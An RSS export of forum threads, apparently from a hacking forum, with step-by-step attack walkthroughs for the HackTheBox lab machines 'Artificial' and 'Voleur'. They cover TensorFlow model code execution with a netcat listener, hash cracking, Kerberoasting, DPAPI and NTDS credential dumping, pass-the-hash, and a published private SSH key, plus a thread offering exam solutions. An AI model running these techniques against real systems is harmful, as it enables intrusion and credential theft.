<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[PwnForums - HackTheBox]]></title>
		<link>https://pwnforums.st/</link>
		<description><![CDATA[PwnForums - https://pwnforums.st]]></description>
		<pubDate>Wed, 08 Apr 2026 11:49:13 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[SUMMUS: Extreme Red Teamer Lab]]></title>
			<link>https://pwnforums.st/Thread-SUMMUS-Extreme-Red-Teamer-Lab</link>
			<pubDate>Tue, 10 Feb 2026 15:37:16 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=231986">f4k3h4ck3r</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-SUMMUS-Extreme-Red-Teamer-Lab</guid>
			<description><![CDATA[Has anyone done then the <span style="font-weight: bold;" class="mycode_b">SUMMUS: Extreme Red Teamer Lab</span>?<br />
<br />
Can anyone share writeup?]]></description>
			<content:encoded><![CDATA[Has anyone done then the <span style="font-weight: bold;" class="mycode_b">SUMMUS: Extreme Red Teamer Lab</span>?<br />
<br />
Can anyone share writeup?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - ARTIFICIAL.HTB - EASY LINUX]]></title>
			<link>https://pwnforums.st/Thread-HTB-ARTIFICIAL-HTB-EASY-LINUX</link>
			<pubDate>Tue, 10 Feb 2026 14:12:52 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HTB-ARTIFICIAL-HTB-EASY-LINUX</guid>
			<description><![CDATA[ARTIFICIAL - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.10.11.74 <br />
dn: artificial.htb<br />
<br />
Initial access<br />
---------------------------------------<br />
Vuln: <a href="https://splint.gitbook.io/cyberblog/security-research/tersorflow-remote-code-execution-with-malicious-model" target="_blank" rel="noopener" class="mycode_url">https://splint.gitbook.io/cyberblog/secu...ious-model</a><br />
Webapp allows uploading TensorFlow H5 models - executes Lambda layer code during inference<br />
<br />
exploit.py: <a href="https://pastebin.com/cWyDqzv0" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/cWyDqzv0</a> (waf block the code)<br />
<br />
Build exploit (must be in docker or right env):<br />
<br />
docker run -it --rm \<br />
-v "&#36;PWD":/workspace \<br />
-w /workspace \<br />
tensorflow/tensorflow:2.13.0 python3 exploit.py<br />
<br />
Execute:<br />
# Listener<br />
nc -lvnp 1337<br />
<br />
# Upload exploit.h5 via web interface<br />
# Click "Show Prediction" to trigger payload<br />
# Shell as uid-100 (app group)<br />
<br />
DB Creds extract<br />
-------------------<br />
Find SQLite DB:<br />
find . -name "*.db" 2&gt;/dev/null<br />
sqlite3 users.db<br />
.tables<br />
SE/LECT * FR/OM user; (REMOVE THE SLASH, WAF BLOCK ME)<br />
<br />
Extracted hashes:<br />
gael:c99175974b6e192936d97224638a34f8<br />
mark:0f3d8c76530022670f1c6029eed09ccb<br />
robert:b606c5f5136170f15444251665638b36<br />
royer:bc25b1f80f544c0ab451c02a3dca9fc6<br />
mary:bf041041e57f1aff3be7ea1abd6129d0<br />
<br />
Crack with john:<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt<br />
<br />
Cracked:<br />
gael:mattp005numbertwo<br />
royer:marwinnarak043414036<br />
<br />
SSH Access<br />
------------------<br />
ssh gael@artificial.htb<br />
password: mattp005numbertwo<br />
cat user.txt<br />
<br />
Port discover <br />
--------------<br />
netstat -tlnp | grep 127.0.0.1<br />
Found port 9898 on 127.0.0.1 LISTEN<br />
<br />
Port forwarding:<br />
ssh -L 9898:127.0.0.1:9898 gael@artificial.htb<br />
<br />
BACKREST recon<br />
--------------<br />
Creds already found dont work - need to search for backup on server<br />
<br />
find / -type f -name "*backup*" 2&gt;/dev/null<br />
Found: /var/backups/backrest_backup.tar.gz<br />
<br />
Download and extract backrest_backup.tar.gz:<br />
├── backrest<br />
├── .config<br />
│ └── backrest<br />
│ └── config.json<br />
├── install.sh<br />
├── jwt-secret<br />
├── oplog.sqlite<br />
├── oplog.sqlite.lock<br />
├── oplog.sqlite-shm<br />
├── oplog.sqlite-wal<br />
├── processlogs<br />
│ └── backrest.log<br />
├── restic<br />
└── tasklogs<br />
├── .inprogress<br />
├── logs.sqlite<br />
├── logs.sqlite-shm<br />
└── logs.sqlite-wal<br />
<br />
in config.json:<br />
<br />
"name": "backrest_root",<br />
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"<br />
<br />
<br />
Crack bcrypt hash:<br />
echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d &gt; hash.bcrypt<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.bcrypt<br />
<br />
Password: backrest_root:!@#&#36;%^<br />
<br />
Privesc<br />
------------------------<br />
Backrest access:<br />
URL: <a href="http://localhost:9898" target="_blank" rel="noopener" class="mycode_url">http://localhost:9898</a><br />
Creds: backrest_root / !@#&#36;%^<br />
<br />
Create repo first before creating plan:<br />
Name: test<br />
Type: Local<br />
Path: /tmp<br />
<br />
Create backup plan to grab root.txt:<br />
Name: exploit<br />
Repository: test<br />
Paths: /root/<br />
<br />
Get root.txt:<br />
1. Execute backup via "Backup Now"<br />
2. Wait for green status<br />
3. Click completed backup → "Snapshot Browser"<br />
4. Navigate to /root/root.txt in snapshot browser<br />
5. Restore to /etc/root<br />
6. Download restored file<br />
<br />
Got root.txt flag<br />
(can also get revshell with hook command option in plan)<br />
<br />
Credentials summary (for noob)<br />
-------------------<br />
gael:mattp005numbertwo (SSH)<br />
royer:marwinnarak043414036 (cracked hash)<br />
backrest_root:!@#&#36;%^ (Backrest web interface)]]></description>
			<content:encoded><![CDATA[ARTIFICIAL - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.10.11.74 <br />
dn: artificial.htb<br />
<br />
Initial access<br />
---------------------------------------<br />
Vuln: <a href="https://splint.gitbook.io/cyberblog/security-research/tersorflow-remote-code-execution-with-malicious-model" target="_blank" rel="noopener" class="mycode_url">https://splint.gitbook.io/cyberblog/secu...ious-model</a><br />
Webapp allows uploading TensorFlow H5 models - executes Lambda layer code during inference<br />
<br />
exploit.py: <a href="https://pastebin.com/cWyDqzv0" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/cWyDqzv0</a> (waf block the code)<br />
<br />
Build exploit (must be in docker or right env):<br />
<br />
docker run -it --rm \<br />
-v "&#36;PWD":/workspace \<br />
-w /workspace \<br />
tensorflow/tensorflow:2.13.0 python3 exploit.py<br />
<br />
Execute:<br />
# Listener<br />
nc -lvnp 1337<br />
<br />
# Upload exploit.h5 via web interface<br />
# Click "Show Prediction" to trigger payload<br />
# Shell as uid-100 (app group)<br />
<br />
DB Creds extract<br />
-------------------<br />
Find SQLite DB:<br />
find . -name "*.db" 2&gt;/dev/null<br />
sqlite3 users.db<br />
.tables<br />
SE/LECT * FR/OM user; (REMOVE THE SLASH, WAF BLOCK ME)<br />
<br />
Extracted hashes:<br />
gael:c99175974b6e192936d97224638a34f8<br />
mark:0f3d8c76530022670f1c6029eed09ccb<br />
robert:b606c5f5136170f15444251665638b36<br />
royer:bc25b1f80f544c0ab451c02a3dca9fc6<br />
mary:bf041041e57f1aff3be7ea1abd6129d0<br />
<br />
Crack with john:<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt<br />
<br />
Cracked:<br />
gael:mattp005numbertwo<br />
royer:marwinnarak043414036<br />
<br />
SSH Access<br />
------------------<br />
ssh gael@artificial.htb<br />
password: mattp005numbertwo<br />
cat user.txt<br />
<br />
Port discover <br />
--------------<br />
netstat -tlnp | grep 127.0.0.1<br />
Found port 9898 on 127.0.0.1 LISTEN<br />
<br />
Port forwarding:<br />
ssh -L 9898:127.0.0.1:9898 gael@artificial.htb<br />
<br />
BACKREST recon<br />
--------------<br />
Creds already found dont work - need to search for backup on server<br />
<br />
find / -type f -name "*backup*" 2&gt;/dev/null<br />
Found: /var/backups/backrest_backup.tar.gz<br />
<br />
Download and extract backrest_backup.tar.gz:<br />
├── backrest<br />
├── .config<br />
│ └── backrest<br />
│ └── config.json<br />
├── install.sh<br />
├── jwt-secret<br />
├── oplog.sqlite<br />
├── oplog.sqlite.lock<br />
├── oplog.sqlite-shm<br />
├── oplog.sqlite-wal<br />
├── processlogs<br />
│ └── backrest.log<br />
├── restic<br />
└── tasklogs<br />
├── .inprogress<br />
├── logs.sqlite<br />
├── logs.sqlite-shm<br />
└── logs.sqlite-wal<br />
<br />
in config.json:<br />
<br />
"name": "backrest_root",<br />
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"<br />
<br />
<br />
Crack bcrypt hash:<br />
echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d &gt; hash.bcrypt<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.bcrypt<br />
<br />
Password: backrest_root:!@#&#36;%^<br />
<br />
Privesc<br />
------------------------<br />
Backrest access:<br />
URL: <a href="http://localhost:9898" target="_blank" rel="noopener" class="mycode_url">http://localhost:9898</a><br />
Creds: backrest_root / !@#&#36;%^<br />
<br />
Create repo first before creating plan:<br />
Name: test<br />
Type: Local<br />
Path: /tmp<br />
<br />
Create backup plan to grab root.txt:<br />
Name: exploit<br />
Repository: test<br />
Paths: /root/<br />
<br />
Get root.txt:<br />
1. Execute backup via "Backup Now"<br />
2. Wait for green status<br />
3. Click completed backup → "Snapshot Browser"<br />
4. Navigate to /root/root.txt in snapshot browser<br />
5. Restore to /etc/root<br />
6. Download restored file<br />
<br />
Got root.txt flag<br />
(can also get revshell with hook command option in plan)<br />
<br />
Credentials summary (for noob)<br />
-------------------<br />
gael:mattp005numbertwo (SSH)<br />
royer:marwinnarak043414036 (cracked hash)<br />
backrest_root:!@#&#36;%^ (Backrest web interface)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exam solutions]]></title>
			<link>https://pwnforums.st/Thread-Exam-solutions</link>
			<pubDate>Mon, 09 Feb 2026 18:05:25 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=710416">ninja0fninja</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Exam-solutions</guid>
			<description><![CDATA[DM me in discord.com/users/1205111888346742887 (<dvz_me_placeholder id="0" />) if you are interested in exams solution]]></description>
			<content:encoded><![CDATA[DM me in discord.com/users/1205111888346742887 (<dvz_me_placeholder id="0" />) if you are interested in exams solution]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - VOLEUR.HTB - MEDIUM WINDOWS]]></title>
			<link>https://pwnforums.st/Thread-HTB-VOLEUR-HTB-MEDIUM-WINDOWS</link>
			<pubDate>Mon, 09 Feb 2026 17:00:53 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HTB-VOLEUR-HTB-MEDIUM-WINDOWS</guid>
			<description><![CDATA[VOLEUR - HACKTHEBOX<br />
WINDOWS - MEDIUM<br />
<br />
Can provide my personal notes for the machine if anyone's interested <img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fsmile.png" alt="Smile" title="Smile" class="smilie smilie_1" /><br />
<br />
IP: 10.10.11.76<br />
Domain: voleur.htb<br />
DC: dc.voleur.htb<br />
<br />
KRB5.CONF Setup<br />
---------------<br />
[libdefaults]<br />
default_realm = VOLEUR.HTB<br />
dns_lookup_realm = false<br />
dns_lookup_kdc = false<br />
<br />
[realms]<br />
VOLEUR.HTB = {<br />
kdc = dc.voleur.htb<br />
}<br />
<br />
[domain_realm]<br />
.voleur.htb = VOLEUR.HTB<br />
voleur.htb = VOLEUR.HTB<br />
<br />
Initial access (w given creds)<br />
-----------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'<br />
export KRB5CCNAME=ryan.naylor.ccache<br />
<br />
SMB ENUM<br />
---------------<br />
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares<br />
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""<br />
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"<br />
<br />
Download encrypted Excel:<br />
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT<br />
<br />
Crack EXCEL pass<br />
--------------------<br />
office2john Access_Review.xlsx &gt; xlsx.h<br />
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txt<br />
Result: football1<br />
<br />
Decrypt n extract creds<br />
------------------------<br />
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx<br />
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'<br />
<br />
Found creds:<br />
Todd.Wolfe - Password reset to NightT1meP1dg3on14, account deleted<br />
svc_ldap - M1XyC9pW7qT5Vn<br />
svc_iis - N5pXyW1VqM7CZ8<br />
<br />
Targeting KERBEROASTING<br />
-----------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'<br />
export KRB5CCNAME=svc_ldap.ccache<br />
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txt<br />
<br />
Got TGS hash:<br />
&#36;krb5tgs&#36;23&#36;*svc_winrm&#36;VOLEUR.HTB&#36;voleur.htb/svc_winrm*&#36;cf6535bc0a95a2ed7b815852807efa4a&#36;7c691543631009fafbab519015753c7a698f46eee1f81172b80fdc7870973917d63431bf32a302be9e41e8e8673c0c5fb3c532d0519992ccf29cdbf734110ea318f7c273267f5bd44ff89c3090a539c1c073b0ffce1271c0996951f850d627dd711136fc4b43d432339fe3ccb9b2cb5f80537dfab041dbed384d655a636ce03009d0f075c0ae151314739b464487e8db54661ae9b20dd4585ab895bfbc972979fe1cbccccfb1855e0b5b4b389ef54c26aa443e4db34d31ba325ffa413e7ff2411fe6f39abea6b62b9d20293aa9db7dbb422a108c2dcd357ebb4268255d182f2c06b682e98b56b7cf8094f50285e300c3cdf7f71054b14e0e04ac0d3d68644c290356457b55e6334054874aaa3d3eb6770f3fd859455ce5778532316cb3260f565bcafd7c7d2f144a55aa4447516ab48cbabf63f34b436164c69c0d304be917a8032406cdfa8d2c3b69ef545490ae5e6f109e6455445739b6283da1e819fbbbf0649b4b740cb444c7e38bc49ddb7372836c4a61039e3437165fd06231000cd41f5917494ab462999d0a885b3742dad0b3ca480a25bad5087c90d30f95633c5e3e105201cf82e7874ef0f1c15c1b88585ab5dddbf006e6b06b215eb3b8d23d7edc8da5f6e7bde088315e764129c6901d22922c5aa379c401a8dde101bf71d8f3dafacc33b994f807d1ae5138db18fd1757bf31eae41c98c6a68bc50809fca7973039c4899f878174a0933d69a8fa7eaa1eb8dd5688b319f66c7e3bc463f9bf92a9cc8bb96e740be99f8b74371ac102aafde1b96a1860f8478335296ff9d2827710349c61862e4c8b0dbaa4cbd62276e3a14075d3b70038fc25842e3210844fa7bf7cc1da0a209c08cf219fc0148ef19bd5efcb9d0bbacace0749fb18e665fa73b137952cbaf364005d5e6b1b70e916ef553d015de218974f5f5bbc7b677b5eb062ff2735a263f8afe77cc73f1acb026a33ebd5037990ddb8f108a5aeee0146a72ebf167a65c1bd0a1b68b0d4f283f3a1c688aba30b4169505def1b541010d2e54ab51ddcf1699bb3343d6a817a227a7c9df8d75c43d4da4eba17c6eed4d72b2450138e2135d80ffeb4d6393c95ad0bf28f74d43c960f6f6cc0aec28e07c5eb36b2665a2d261cfed516dd3cc459411da99ffa2d5dabc5c9dc899f537ef6add3deef15526fbb5175664c1f514f17c13de74c6d01f19b6ee93e911dbcc2a2b4b10e9a31aaf3c0fb6ed4a39e8a85a2b09c7b3c79b3f2b79345779d0aeef29c1d84d77a02f73e4f25bca3391c9795531bbd3c6fa371a69afa1c38185bfd47de627f8bf11601322bf16ddb73c68af700e3eccc901665cf4c227c4a6cb5f952ab35969934d40ae5699f6fe41dd0f839eaff4cb78a02023db6692d9ddf56dccdc3d3f33d934fc972bc2671c1e2a04bb97ddec87927918fb8b94ab59f9d6bbf13f08b100d767cce7c0ed386c4b64f9a11ebe387ed8e281106<br />
<br />
Crack TGS:<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txt<br />
Result: svc_winrm:AFireInsidedeOzarctica980219afi<br />
<br />
WINRM Access<br />
-------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'<br />
export KRB5CCNAME=FILE<img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fconfused.png" alt="Confused" title="Confused" class="smilie smilie_13" />vc_winrm.ccache<br />
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB<br />
<br />
Restore deleted user<br />
----------------------------------<br />
&#36;cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))<br />
Import-Module ActiveDirectory<br />
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential &#36;cred | Restore-ADObject -Credential &#36;cred<br />
Get-ADUser todd.wolfe<br />
<br />
Access TODD.WOLFE SMB Share<br />
---------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'<br />
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb<br />
<br />
use IT<br />
cd Second-Line Support<br />
cd Archived Users<br />
cd todd.wolfe<br />
<br />
DPAPI Creds extract<br />
----------------------------<br />
Found DPAPI protected creds in AppData/Roaming/Microsoft/<br />
<br />
Extract masterkey:<br />
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"<br />
<br />
Masterkey:<br />
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83<br />
<br />
Decrypt creds:<br />
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83<br />
<br />
Result:<br />
Username: jeremy.combs<br />
Password: qT3V9pLXyN7W4m<br />
<br />
JEREMY.COMBS Access<br />
-------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'<br />
export KRB5CCNAME=FILE:jeremy.combs.ccache<br />
<br />
evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (works but useless)<br />
<br />
KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htb<br />
<br />
SSH KEY Discover<br />
-----------------<br />
Found in SMB share:<br />
<br />
note.txt.txt:<br />
"Jeremy, I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux. Please see what you can set up. Thanks, Admin"<br />
<br />
id_rsa:<br />
-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn<br />
NhAAAAAwEAAQAAAYEAqFyPMvURW/qbyRlemAMzaPVvfR7JNHznL6xDHP4o/hqWIzn3dZ66<br />
P2absMgZy2XXGf2pO0M13UidiBaF3dLNL7Y1SeS/DMisE411zHx6AQMepj0MGBi/c1Ufi7<br />
rVMq+X6NJnb2v5pCzpoyobONWorBXMKV9DnbQumWxYXKQyr6vgSrLd3JBW6TNZa3PWThy9<br />
wrTROegdYaqCjzk3Pscct66PhmQPyWkeVbIGZAqEC/edfONzmZjMbn7duJwIL5c68MMuCi<br />
9u91MA5FAignNtgvvYVhq/pLkhcKkh1eiR01TyUmeHVJhBQLwVzcHNdVk+GO+NzhyROqux<br />
haaVjcO8L3KMPYNUZl/c4ov80IG04hAvAQIGyNvAPuEXGnLEiKRcNg+mvI6/sLIcU5oQkP<br />
JM7XFlejSKHfgJcP1W3MMDAYKpkAuZTJwSP9ISVVlj4R/lfW18tKiiXuygOGudm3AbY65C<br />
lOwP+sY7+rXOTA2nJ3qE0J8gGEiS8DFzPOF80OLrAAAFiIygOJSMoDiUAAAAB3NzaC1yc2<br />
EAAAGBAKhcjzL1EVv6m8kZXpgDM2j1b30eyTR85y+sQxz+KP4aliM593Weuj9mm7DIGctl<br />
1xn9qTtDNd1InYgWhd3SzS+2NUnkvwzIrBONdcx8egEDHqY9DBgYv3NVH4u61TKvl+jSZ2<br />
9r+aQs6aMqGzjVqKwVzClfQ520LplsWFykMq+r4Eqy3dyQVukzWWtz1k4cvcK00TnoHWGq<br />
go85Nz7HHLeuj4ZkD8lpHlWyBmQKhAv3nXzjc5mYzG5+3bicCC+XOvDDLgovbvdTAORQIo<br />
JzbYL72FYav6S5IXCpIdXokdNU8lJnh1SYQUC8Fc3BzXVZPhjvjc4ckTqrsYWmlY3DvC9y<br />
jD2DVGZf3OKL/NCBtOIQLwECBsjbwD7hFxpyxIikXDYPpryOv7CyHFOaEJDyTO1xZXo0ih<br />
34CXD9VtzDAwGCqZALmUycEj/SElVZY+Ef5X1tfLSool7soDhrnZtwG2OuQpTsD/rGO/q1<br />
zkwNpyd6hNCfIBhIkvAxczzhfNDi6wAAAAMBAAEAAAGBAIrVgPSZaI47s5l6hSm/gfZsZl<br />
p8N5lD4nTKjbFr2SvpiqNT2r8wfA9qMrrt12+F9IInThVjkBiBF/6v7AYHHlLY40qjCfSl<br />
ylh5T4mnoAgTpYOaVc3NIpsdt9zG3aZlbFR+pPMZzAvZSXTWdQpCDkyR0QDQ4PY8Li0wTh<br />
FfCbkZd+TBaPjIQhMd2AAmzrMtOkJET0B8KzZtoCoxGWB4WzMRDKPbAbWqLGyoWGLI1Sj1<br />
MPZareocOYBot7fTW2C7SHXtPFP9+kagVskAvaiy5Rmv2qRfu9Lcj2TfCVXdXbYyxTwoJF<br />
ioxGl+PfiieZ6F8v4ftWDwfC+Pw2sD8ICK/yrnreGFNxdPymck+S8wPmxjWC/p0GEhilK7<br />
wkr17GgC30VyLnOuzbpq1tDKrCf8VA4aZYBIh3wPfWFEqhlCvmr4sAZI7B+7eBA9jTLyxq<br />
3IQpexpU8BSz8CAzyvhpxkyPXsnJtUQ8OWph1ltb9aJCaxWmc1r3h6B4VMjGILMdI/KQAA<br />
AMASKeZiz81mJvrf2C5QgURU4KklHfgkSI4p8NTyj0WGAOEqPeAbdvj8wjksfrMC004Mfa<br />
b/J+gba1MVc7v8RBtKHWjcFe1qSNSW2XqkQwxKb50QD17TlZUaOJF2ZSJi/xwDzX+VX9r+<br />
vfaTqmk6rQJl+c3sh+nITKBN0u7Fr/ur0/FQYQASJaCGQZvdbw8Fup4BGPtxqFKETDKC09<br />
41/zTd5viNX38LVig6SXhTYDDL3eyT5DE6SwSKleTPF+GsJLgAAADBANMs31CMRrE1ECBZ<br />
sP+4rqgJ/GQn4ID8XIOG2zti2pVJ0dx7I9nzp7NFSrE80Rv8vH8Ox36th/X0jme1AC7jtR<br />
B+3NLjpnGA5AqcPklI/lp6kSzEigvBl4nOz07fj3KchOGCRP3kpC5fHqXe24m3k2k9Sr+E<br />
a29s98/18SfcbIOHWS4AUpHCNiNskDHXewjRJxEoE/CjuNnrVIjzWDTwTbzqQV+FOKOXoV<br />
B9NzMi0MiCLy/HJ4dwwtce3sssxUk7pQAAAMEAzBk3mSKy7UWuhHExrsL/jzqxd7bVmLXU<br />
EEju52GNEQL1TW4UZXVtwhHYrb0Vnu0AE+r/16o0gKScaa+lrEeQqzIARVflt7ZpJdpl3Z<br />
fosiR4pvDHtzbqPVbixqSP14oKRSeswpN1Q50OnD11tpIbesjH4ZVEXv7VY9/Z8VcooQLW<br />
GSgUcaD+U9Ik13vlNrrZYs9uJz3aphY6Jo23+7nge3Ui7ADEvnD3PAtzclU3xMFyX9Gf+9<br />
RveMEYlXZqvJ9PAAAADXN2Y19iYWNrdXBAREMBAgMEBQ==<br />
-----END OPENSSH PRIVATE KEY-----<br />
<br />
SSH access via WSL<br />
--------------------------------<br />
chmod 400 id_rsa<br />
ssh -p 2222 -i id_rsa svc_backup@voleur.htb<br />
<br />
AD Database extract<br />
----------------------<br />
Found in /mnt/c/IT/THIRD-LINE SUPPORT/:<br />
./Active Directory: ntds.dit ntds.jfm<br />
./registry: SECURITY SYSTEM<br />
<br />
Extract NTLM hashes:<br />
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL<br />
<br />
Administrator hash:<br />
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::<br />
<br />
Admin Access<br />
-----------<br />
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator<br />
export KRB5CCNAME=FILE:administrator.ccache<br />
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB<br />
<br />
CREDENTIALS SUMMARY (for noobs)<br />
-------------------<br />
ryan.naylor:HollowOct31Nyt (Initial access)<br />
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)<br />
svc_ldap:M1XyC9pW7qT5Vn (Excel file)<br />
svc_iis:N5pXyW1VqM7CZ8 (Excel file)<br />
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)<br />
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)<br />
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)]]></description>
			<content:encoded><![CDATA[VOLEUR - HACKTHEBOX<br />
WINDOWS - MEDIUM<br />
<br />
Can provide my personal notes for the machine if anyone's interested <img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fsmile.png" alt="Smile" title="Smile" class="smilie smilie_1" /><br />
<br />
IP: 10.10.11.76<br />
Domain: voleur.htb<br />
DC: dc.voleur.htb<br />
<br />
KRB5.CONF Setup<br />
---------------<br />
[libdefaults]<br />
default_realm = VOLEUR.HTB<br />
dns_lookup_realm = false<br />
dns_lookup_kdc = false<br />
<br />
[realms]<br />
VOLEUR.HTB = {<br />
kdc = dc.voleur.htb<br />
}<br />
<br />
[domain_realm]<br />
.voleur.htb = VOLEUR.HTB<br />
voleur.htb = VOLEUR.HTB<br />
<br />
Initial access (w given creds)<br />
-----------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'<br />
export KRB5CCNAME=ryan.naylor.ccache<br />
<br />
SMB ENUM<br />
---------------<br />
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares<br />
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""<br />
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"<br />
<br />
Download encrypted Excel:<br />
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT<br />
<br />
Crack EXCEL pass<br />
--------------------<br />
office2john Access_Review.xlsx &gt; xlsx.h<br />
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txt<br />
Result: football1<br />
<br />
Decrypt n extract creds<br />
------------------------<br />
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx<br />
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'<br />
<br />
Found creds:<br />
Todd.Wolfe - Password reset to NightT1meP1dg3on14, account deleted<br />
svc_ldap - M1XyC9pW7qT5Vn<br />
svc_iis - N5pXyW1VqM7CZ8<br />
<br />
Targeting KERBEROASTING<br />
-----------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'<br />
export KRB5CCNAME=svc_ldap.ccache<br />
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txt<br />
<br />
Got TGS hash:<br />
